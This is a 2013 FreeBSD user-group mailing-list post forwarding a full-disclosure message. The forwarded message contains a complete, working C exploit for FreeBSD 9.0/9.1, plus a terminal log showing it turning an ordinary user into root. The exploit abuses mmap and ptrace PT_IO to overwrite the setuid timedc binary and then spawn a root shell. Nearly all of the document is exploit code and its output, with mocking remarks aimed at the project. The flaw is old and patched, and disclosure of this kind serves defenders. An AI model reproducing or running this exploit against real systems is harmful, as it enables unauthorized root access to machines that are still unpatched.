[FUG-BR] Fwd: Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

Marcelo Gondim gondim@bsdinfo.com.br
Thu Jun 20 09:29:43 BRT 2013


Well, folks,

I know the vulnerability has now been fixed, but it took 20 years to
detect this?  :(
And the program really does work beautifully.


-------- Original Message --------
Subject: Happy Birthday FreeBSD! Now you are 20 years old and your
security is the same as 20 years ago... :)
Date: Wed, 19 Jun 2013 23:32:59 +0200
From: Hunger <hunger@hunger.hu>
To: full-disclosure@lists.grok.org.uk



$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec  4 09:23:10 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul@hunger.hu>
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#


============================ code =========================

/*
 * FreeBSD 9.{0,1} mmap/ptrace exploit
 * by Hunger <fbsd9lul@hunger.hu>
 *
 * Happy Birthday FreeBSD!
 * Now you are 20 years old and your security is the same as 20 years ago...
 *
 * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
 *              sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
 *                      I hope we'll meet again at 8 em 1470n
 *
 * Special thanks to proactivesec.com
 *
 */

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
    int from_fd, to_fd, status;
    struct stat st;
    struct ptrace_io_desc piod;
    char *s, *d;
    pid_t pid;

    /* Second stage: when this code runs with euid 0 (i.e. it has been
     * re-executed as the set-uid target), just spawn a root shell. */
    if (geteuid() == 0) {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;
    }

    printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
    printf("by Hunger <fbsd9lul@hunger.hu>\n");

    /* Source: this binary itself. Destination: the set-uid target,
     * which an unprivileged user can only open read-only. */
    if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
        err(1, "open");

    if (stat(av[0], &st) == -1)
        err(2, "stat");

    /* Both files are mapped MAP_SHARED with PROT_READ only; a direct
     * store into d would fault. */
    if ((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
                  MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED ||
        (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                  MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
        err(3, "mmap");

    if ((pid = fork()) == -1)
        err(4, "fork");

    if (!pid) {
        /* Child: inherits both mappings, lets the parent trace it, exits. */
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
            err(5, "ptraceme");
        return 0;
    }

    if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(6, "ptattach");

    if (wait(&status) == -1)
        err(7, "wait");

    /* Ask the kernel, via PT_IO, to copy this binary (s) over the child's
     * read-only shared mapping of the target (d). On the affected kernels
     * the write is not stopped by the mapping's protection, so the bytes
     * land in the target file's shared pages. */
    piod.piod_op   = PIOD_WRITE_D;
    piod.piod_offs = d;
    piod.piod_addr = s;
    piod.piod_len  = st.st_size;

    if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

    /* Execute the set-uid target, whose pages now hold this program;
     * it enters the geteuid() == 0 branch above. */
    execl(TG, TG, NULL);

    return 0;
}

